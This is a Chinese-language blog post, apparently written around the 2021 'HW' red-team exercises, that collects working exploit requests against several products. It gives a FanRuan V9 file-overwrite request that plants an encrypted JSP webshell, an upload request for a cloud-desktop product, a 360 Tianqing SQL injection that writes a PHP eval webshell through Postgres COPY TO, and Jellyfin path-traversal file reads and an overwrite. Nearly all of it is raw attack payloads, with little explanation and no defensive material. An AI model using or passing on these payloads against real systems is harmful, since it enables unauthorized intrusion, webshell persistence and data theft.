S1xHcL's Blog.

2021-HW

HW
Word count: 847Reading time: 4 min
2021/04/08 Share

帆软 V9 getshell

这个漏洞是任意文件覆盖,上传jsp马,需要找已存在的jsp文件进行覆盖。

例如:Tomcat启动帆软后默认存在的JSP文件,路径/tomcat-7.0.96/webapps/ROOT/index.jsp,覆盖Tomcat自带ROOT目录下的inxdex.jsp文件:

1
2
3
4
5
6
7
8
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 192.168.169.138:8080
User-Agent:	Mozilla/5.0	(Windows NT	10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection:	close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length:	675	
{"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null){String k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>","__CHARSET__":"UTF-8"}

和信创天云桌面命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 164

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/avif

1
------WebKitFormBoundaryfcKRltGv--

360天擎

越权访问

1
https://192.168.24.196:8443//api/dbstat/gettablessize

前台sql注入

注入写shell:

1
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--

利用过程:

  1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
  2. 通过注入点,创建一张表 O
  3. 为 表O 添加一个新字段 T 并且写入shell内容
  4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
  5. 删除 表O

webshell路径: https://192.168.24.196:8443/1.php

Jellyfin任意文件读取

只适用Windows

1
2
3
4
5
6
7
8
9
10
11
12
# 未授权下载(数据库文件:jellyfin.db)
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

# 未授权的任意文件读取 (数据库文件:jellyfin.db)
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1

# 未授权的任意文件读取(数据库文件:jellyfin.db)
GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

# 未授权下载任意图片(假设图片路径 c:\temp\filename.jpg )
GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1
GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1

任意文件覆盖,需要管理员权限

1
2
3
4
5
6
POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1
...
X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..."
...

{"language":".\\..\\","format":".\\..\\test.bin","isForced":false,"data":"base64 encoded data"}

泛微OA

A8前台SQL注入

A9前台无限制getshell

Author:S1xHcL

原文链接:https://s1xhcl.github.io/2021/04/08/2021-HW/

发表日期:April 8th 2021, 9:47:35 pm

更新日期:April 8th 2021, 11:25:07 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 帆软 V9 getshell
  2. 2. 和信创天云桌面命令执行
  3. 3. 360天擎
    1. 3.1. 越权访问
    2. 3.2. 前台sql注入
  4. 4. Jellyfin任意文件读取
  5. 5. 泛微OA
    1. 5.1. A8前台SQL注入
    2. 5.2. A9前台无限制getshell
Total : 46
2024
2023
2022
2021
2019
HW CVE Tools learn Struts Python Windows code InterView Learn PHP Audit Pentest ThinkPHP RCE Sql Windows认证 Kerberos sqlmap sql POC Work OA
POC CVE Audit CVE/EXP CVE/POC C Audit/Java learn Audit/PHP Vul Tips 内网学习 tools bypass POC/YAKIT Pentest 0Day mark